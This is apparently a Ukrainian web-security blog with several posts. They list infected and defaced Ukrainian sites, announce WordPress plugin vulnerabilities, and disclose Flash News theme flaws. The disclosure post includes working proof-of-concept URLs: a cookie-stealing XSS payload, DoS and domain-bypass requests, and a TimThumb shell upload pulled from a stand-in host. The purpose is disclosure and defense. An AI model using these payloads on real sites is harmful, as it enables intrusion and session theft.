Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://sia-house.kiev.ua - інфекція була виявлена 19.02.2013. Зараз сайт входить до переліку підозрілих.
• http://aviso.ua - інфекція була виявлена 17.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://sife.od.ua - інфекція була виявлена 17.02.2013. Зараз сайт входить до переліку підозрілих.
• http://fn.ua - інфекція була виявлена 31.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://luxury.com.ua - інфекція була виявлена 04.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://bulgaria.in.ua - інфекція була виявлена 01.10.2012. Зараз сайт не входить до переліку підозрілих.
• http://dergachirda.com.ua - інфекція була виявлена 14.12.2012. Зараз сайт не входить до переліку підозрілих.
• http://soundmaster.kiev.ua - інфекція була виявлена 07.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://expedition.vn.ua - інфекція була виявлена 12.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://zfort.com.ua - інфекція була виявлена 14.11.2012. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах SolveMedia, OpenInviter та Spam Free. Для котрих з’явилися експлоіти. SolveMedia - це плагін, що являє собою онлайн капча-сервіс, OpenInviter - це плагін для запрошення користувачів через контакти в адресній книзі, Spam Free - це анти-спам плагін.

• WordPress SolveMedia 1.1.0 CSRF Vulnerability (деталі)
• WordPress OpenInviter Information Disclosure (деталі)
• WordPress Spam Free 1.9.2 Filter Bypass (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Після попереднього виявлення похаканих сайтів в моїх логах, приведу нову інформацію про взломані українських сайти. Що використовуються для атак (зокрема RFI атак) на інші сайти. Враховуючи, що після жовтня в моїх логах не було українських сайтів (тільки закордонні), що використовувалися для RFI атак, то я проаналізував більш старіші логи.

Похакані сайти в Уанеті:

• http://photoworld.com.ua (невідомим хакером) - 01.2010
• http://filtry.in.ua (невідомим хакером) - 01.2010
• http://www.epidemia.com.ua (невідомим хакером) - 01.2010
• http://whitelove.at.ua (невідомим хакером) - 02.2010

Файли, що використовувалися для RFI атак (файли вже давно прибрані з сайтів):

http://photoworld.com.ua/zfxid1.txt
http://filtry.in.ua/components/com_mailto/idxx.txt
http://www.epidemia.com.ua/tool/fxd
http://whitelove.at.ua/a.txt

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://www.starasinyava-rda.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.poltav-oblosvita.gov.ua (хакером Dr.SHA6H) - 13.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://grad.gov.ua (хакером DaiLexX) - 27.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://forum.grad.gov.ua (хакером DaiLexX) - 27.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://kievgenplan.grad.gov.ua (хакером DaiLexX) - 27.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://new.vn.ua (хакером SanFour25) - 04.11.2012, зараз сайт вже виправлений адмінами
• http://aelita-dates.com (хакером SANAL ORDU) - 17.08.2012, зараз сайт вже виправлений адмінами
• http://sevastopolcc.org.ua (хакером Napster)
• http://supercomputers.kiev.ua (хакером Badi)
• http://bannex.com.ua (хакером Badi) - 28.01.2013, зараз сайт вже виправлений адмінами

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Developer Formatter, Advanced Custom Fields та Valums Uploader. Для котрих з’явилися експлоіти. Developer Formatter - це плагін для форматування тексту вихідних кодів, Advanced Custom Fields - це плагін для додання додаткових полів, Valums Uploader - це плагін для завантаження файлів.

• Wordpress Developer Formatter CSRF Vulnerability (деталі)
• WordPress Advanced Custom Fields Remote File Inclusion (деталі)
• WordPress Valums Uploader Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Рік тому, Trustwave’s SpiderLabs опублікували численні уразливості в WordPress (що вони виявили наприкінці 2011 року). Я дещо відклав публікацію цих уразливостей, тому роблю це лише зараз. Вирішив детальніше з ними розібратися, бо з опису вони виглядають такими, що важко експлуатуються. І після повідомлення розробникам WP (та подальшого оприлюднення уразливостей), вони відмовилися їх виправляти саме з цієї причини.

В WordPress були виявлені PHP Code Execution, Cross Site Scripting (persistent і reflected) та Brute Force (логінів і паролів MySQL) уразливості. Причому через останню уразливість можна проводити підбор логінів і паролів MySQL Server як на локальному хості, так і зовнішніх хостах.

Раніше я вже писав про XSS уразливість в swfupload в WordPress.

CE / XSS / BF:

Уразливості наявні в setup-config.php. Особливістю атак на них є невелике “вікно атаки” - ці уразливості використати лише коли не встановлений движок на сайті. Тобто коли файли WP були розміщені на сайті, але движок ще не встигли встановити (зазвичай це дуже невеликий проміжок часу, бо движок інсталюють оперативно, тому нападникам важко буде підібрати вдалий час для проведення атаки).

Також я вважаю, що іншими умовами для проведення цих атак може бути використання відповідних уразливостей в WordPress, про які я писав раніше. Коли видалити файл wp-config.php через Arbitrary File Deletion дірку в WP.

• Multiple Vulnerabilities in WordPress (деталі)

Уразливі WordPress 3.3.1 та попередні версії.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://eco-farm.com.ua - інфекція була виявлена 03.01.2013. Зараз сайт входить до переліку підозрілих.
• http://meta.ua - інфекція була виявлена 04.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://dp.biz.ua - інфекція була виявлена 03.01.2013. Зараз сайт входить до переліку підозрілих.
• http://tyachiv.org - інфекція була виявлена 11.01.2013. Зараз сайт не входить до переліку підозрілих.
• http://www.tourism.tyachiv.org - інфекція була виявлена 11.01.2013. Зараз сайт входить до переліку підозрілих.
• http://mts.com.ua - інфекція була виявлена 05.02.2013. Зараз сайт не входить до переліку підозрілих.
• http://hottub.com.ua - інфекція була виявлена 10.12.2012. Зараз сайт входить до переліку підозрілих.
• http://it-group.dp.ua - інфекція була виявлена 17.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://zarabotokplus.com.ua - інфекція була виявлена 31.01.2013. Зараз сайт входить до переліку підозрілих.
• http://vesillya.uz.ua - інфекція була виявлена 26.01.2013. Зараз сайт не входить до переліку підозрілих.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Cardoza, WordPress Uploader та Xerte Online. Для котрих з’явилися експлоіти. Cardoza - це плагін для голосування, WordPress Uploader - це плагін для завантаження файлів (це php-експлоіт для даного плагіна), Xerte Online - це плагін для електронного навчання.

• Multiple SQL injection vulnerabilities in Cardoza Wordpress poll plugin (деталі)
• WordPress Uploader 1.0.4 Shell Upload (деталі)
• WordPress Xerte Online 0.32 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service, Arbitrary File Upload та Information Leakage уразливості в темі Flash News для WordPress. А знайшов я уразливоті в цій темі від WooThemes ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні), а цього разу я дослідив й інші дірки в цій темі.

В інших темах від WooThemes аналогічна ситуація (раніше я привів перелік 89 уразливих тем для WP від них).

XSS (WASC-08):

http://site/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/thumb.php?src=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/flashnews/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в невиправлених версіях TimThumb):

http://site/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/flashnews/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Information Leakage (WASC-13):

http://site/wp-content/themes/flashnews/includes/test.php

XSS (WASC-08) (в PHP < 4.4.1, 4.4.3-4.4.6):

http://site/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Уразливі всі версії теми Flash News для WordPress (в останніх версіях виправлені лише уразливості в thumb.php).

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://civic.kmu.gov.ua (хакером HTC 28 DZ) - 26.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://ladrada.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://nmckherson.gov.ua (хакером SanFour25) - 04.11.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://postsense.net (хакером hacker)
• http://glambaby.com.ua (хакерами з 1923Turk) - 10.12.2012, зараз сайт вже виправлений адмінами